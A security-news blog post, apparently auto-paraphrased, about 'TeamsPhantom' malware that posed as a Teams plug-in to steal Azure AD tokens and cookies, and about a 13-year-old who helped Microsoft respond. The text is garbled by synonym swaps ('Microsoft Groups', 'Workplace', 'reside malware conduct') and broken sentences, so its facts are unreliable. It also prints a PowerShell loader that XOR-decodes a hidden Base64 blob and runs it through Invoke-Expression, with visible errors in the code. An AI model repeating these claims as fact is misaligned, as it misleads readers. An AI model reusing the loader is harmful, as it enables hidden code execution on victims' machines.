Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
13-Year-Old Dylan – Youngest Security Researcher Collaborates with Microsoft Security Response Center

13-Year-Old Dylan – Youngest Security Researcher Collaborates with Microsoft Security Response Center

Posted on July 3, 2025July 3, 2025 By CWS

The sudden emergence of the “TeamsPhantom” malware in early June rattled faculty districts and multinational companies alike.

Masquerading as a innocent Microsoft Groups plug-in, the menace weaponized professional assembly invites to sideload a multi-stage loader that siphoned Azure AD refresh tokens and session cookies.

Inside forty-eight hours, telemetry confirmed probing exercise on greater than 24,000 endpoints, whereas red-team simulations confirmed the malware’s means to pivot into SharePoint and OneDrive assets.

Regardless of a flurry of anomalous Graph API calls lighting up SOC dashboards, it was 13-year-old Dylan—already celebrated for a number of accountable disclosures—who correlated the site visitors to a beforehand unseen token-replay approach.

Microsoft analysts quickly famous the marketing campaign’s distinctive abuse of conversational webhooks to impersonate tenant directors, validating Dylan’s findings and triggering an emergency takedown window. The attacker’s chain from spear-phishing invite to privilege escalation.

Impression assessments reveal selective exfiltration of proprietary paperwork and Groups chat histories, intensifying considerations over intellectual-property leakage.

Victims reported phantom calendar entries and rogue channels, indicators that allowed blue groups to pivot hunts towards the plug-in’s hashed manifest.

Dylan’s after-action temporary warns that interface extensibility, when left unguarded, turns into a high-impact assault floor. Whereas these items maps the adversary’s replay loop in opposition to Microsoft’s Zero-Belief pillars.

By the week’s finish, Microsoft revoked 187 compromised code-signing certificates and tightened store-side validation.

But copy-cat variants already probe new obfuscation layers, illustrating how rapidly legal tooling evolves.

Dylan, now the youngest contributor to MSRC’s malware-response playbooks, has begun co-authoring detection logic that flags unsolicited add-on manifests—proof that recent eyes can upend entrenched threat-intel paradigms.

An infection Mechanism

In contrast to macro-laden Workplace droppers, TeamsPhantom embeds its bootstrapper inside a Base64-encoded appSettings block that the Groups shopper parses at start-up.

The blob expands into an obfuscated PowerShell loader operating in constrained-language mode, trimming AMSI visibility. As soon as memory-resident, the loader decrypts its C2 record by XOR-ing every byte with the tenant’s personal GUID—a sly trick that defeats static indicators.

A 38-line JavaScript module then hooks the onMessageReceived handler to reap authentication cookies in actual time.

$guid = (Get-AzureADTenantDetail).ObjectId
$appCfg = Get-Content material “$Env:APPDATAMicrosoftGroupsappSettings.json” | ConvertFrom-Json
$bytes = [Convert]::FromBase64String($appCfg.bootstrap)
$decoded = -join ($bytes | % { $_ -bxor ($guid.ToByteArray()[$_-1]) })
Invoke-Expression ([Text.Encoding]::UTF8.GetString($decoded))

Microsoft’s patch closes the manifest-validation hole, however defenders are urged to watch tenant-wide add-on registrations and hunt for GUID-based XOR loops in script blocks.

Examine reside malware conduct, hint each step of an assault, and make sooner, smarter safety selections -> Attempt ANY.RUN now

Cyber Security News Tags:13YearOld, Center, Collaborates, Dylan, Microsoft, Researcher, Response, Security, Youngest

Post navigation

Previous Post: AI Tools Like GPT Direct Users to Phishing Sites Instead of Legitimate Ones
Next Post: Android Spyware Catwatchful Exposes Credentials of Over 62,000+ Customer Accounts

Related Posts

10-Year-Old Roundcube RCE Vulnerability Let Attackers Execute Malicious Code 10-Year-Old Roundcube RCE Vulnerability Let Attackers Execute Malicious Code Cyber Security News
Lazarus APT Group New ScoringMathTea RAT Enables Remote Command Execution Among Other Capabilities Lazarus APT Group New ScoringMathTea RAT Enables Remote Command Execution Among Other Capabilities Cyber Security News
NightSpire Ransomware Group Claims to Exploit The Vulnerabilities of Orgs to Infiltrate Their Systems NightSpire Ransomware Group Claims to Exploit The Vulnerabilities of Orgs to Infiltrate Their Systems Cyber Security News
New Semantic Chaining Jailbreak Attack Bypasses Grok 4 and Gemini Nano Security Filters New Semantic Chaining Jailbreak Attack Bypasses Grok 4 and Gemini Nano Security Filters Cyber Security News
SmartTube YouTube App for Android TV Compromised Following Exposure of Signing Keys SmartTube YouTube App for Android TV Compromised Following Exposure of Signing Keys Cyber Security News
Preventing Phishing Attacks on Cryptocurrency Exchanges Preventing Phishing Attacks on Cryptocurrency Exchanges Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News